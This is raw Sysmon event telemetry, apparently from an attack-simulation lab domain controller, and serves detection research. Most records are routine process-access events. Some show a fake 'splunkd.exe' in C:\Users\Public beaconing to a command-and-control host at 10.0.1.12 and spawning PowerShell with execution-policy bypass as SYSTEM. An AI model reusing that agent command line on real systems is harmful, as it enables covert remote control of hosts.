10341000x80000000000000001830Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001829Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001828Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001827Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-3E00-000000009101}3824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001826Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8551-5FCF-3300-000000009101}30803084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8552-5FCF-3E00-000000009101}3824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001825Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.106{10ACEC4A-8552-5FCF-3E00-000000009101}3824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001824Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.070{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8552-5FCF-3D00-000000009101}4060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001823Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.070{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8552-5FCF-3D00-000000009101}4060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001822Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.040{10ACEC4A-8552-5FCF-3D00-000000009101}4060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_l33kyz3l.vhx.ps12020-12-08 13:53:22.040 10341000x80000000000000001821Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.022{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-3D00-000000009101}4060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001820Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.009{10ACEC4A-8548-5FCF-2600-000000009101}24682444C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-3D00-000000009101}4060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001819Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.008{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001818Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.008{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001817Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.008{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001816Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.008{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001815Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.007{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001814Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.007{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001813Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.007{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001812Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.007{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001811Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.007{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001810Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.007{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-3D00-000000009101}4060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001809Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.006{10ACEC4A-8548-5FCF-2500-000000009101}23042612C:\Users\Public\splunkd.exe{10ACEC4A-8552-5FCF-3D00-000000009101}4060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000001808Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.007{10ACEC4A-8552-5FCF-3D00-000000009101}4060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C nlmrqzC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 10341000x80000000000000002188Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.977{10ACEC4A-8553-5FCF-5B00-000000009101}24562540C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000002187Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localUsermode2020-12-08 13:53:21.361{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-935.attackrange.local49682-false10.0.1.12-7010- 10341000x80000000000000002186Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.852{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002185Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.852{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002184Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8553-5FCF-5B00-000000009101}2456C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002183Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002182Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 